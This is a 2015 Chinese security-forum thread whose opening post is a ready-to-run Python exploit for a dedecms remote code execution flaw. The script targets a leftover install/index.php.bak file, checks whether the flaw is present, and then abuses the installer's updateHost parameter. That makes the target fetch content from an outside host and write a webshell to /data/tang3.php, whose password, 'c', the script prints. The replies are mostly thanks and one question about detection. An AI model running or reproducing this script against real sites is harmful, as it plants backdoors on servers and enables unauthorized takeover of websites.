查看: 67049|回复: 158

dedecms远程代码执行利用脚本

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-7-23 11:39:12 | 显示全部楼层 |阅读模式
    转自90sec@Joseph

    [Python] 纯文本查看 复制代码
    #! /usr/bin/env python
    #coding=utf-8
    #Joseph(小续)
     
    import requests
    import sys
    import re
    def main():
        try:
            url="http://"+sys.argv[1].strip('http://')
        except IndexError:
            print '''
            poc: dede.py [url]http://www.baidu.com/[/url]
            '''
        payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
        urlpoc=url+payload
        code=requests.get(urlpoc).status_code
        if code==200:
            print u"恭喜存在此漏洞"
            print u"Ongoing attacks--->>>>>"
            exploit(url)
            pass
        else:
            print u"sorry 漏洞正在挣扎"
            pass
    def exploit(url):
        urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"
        htmlcontent=requests.get(urlpoc).content
        Probe=re.compile(r'存在')
        if Probe.findall(htmlcontent):
            print u'''
            ver:getshell成功
            shell:url+/data/tang3.php?a=0  密码为:c
            '''
            pass
        else:
            print u"请看远程地址是否已经不可用"
            pass
    if __name__ == '__main__':
        main()
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-7-23 14:29:10 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-25 17:01:24 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-3-21 18:10
  • 签到天数: 77 天

    [LV.6]常住居民II

    发表于 2015-7-26 00:42:31 | 显示全部楼层
    90 大大  如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

    点评

    对的  详情 回复 发表于 2015-7-26 16:56
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-26 08:09:42 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-7-31 10:41
  • 签到天数: 43 天

    [LV.5]常住居民I

    发表于 2015-7-26 12:20:11 | 显示全部楼层
    感谢分享,收藏!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-26 15:35:27 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-5-30 10:02
  • 签到天数: 67 天

    [LV.6]常住居民II

    发表于 2015-7-26 16:56:55 | 显示全部楼层
    qjf541502724 发表于 2015-7-26 00:42
    90 大大  如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

    对的                     
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-7-26 17:38:38 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-26 21:45:15 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 00:29 , Processed in 0.031450 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部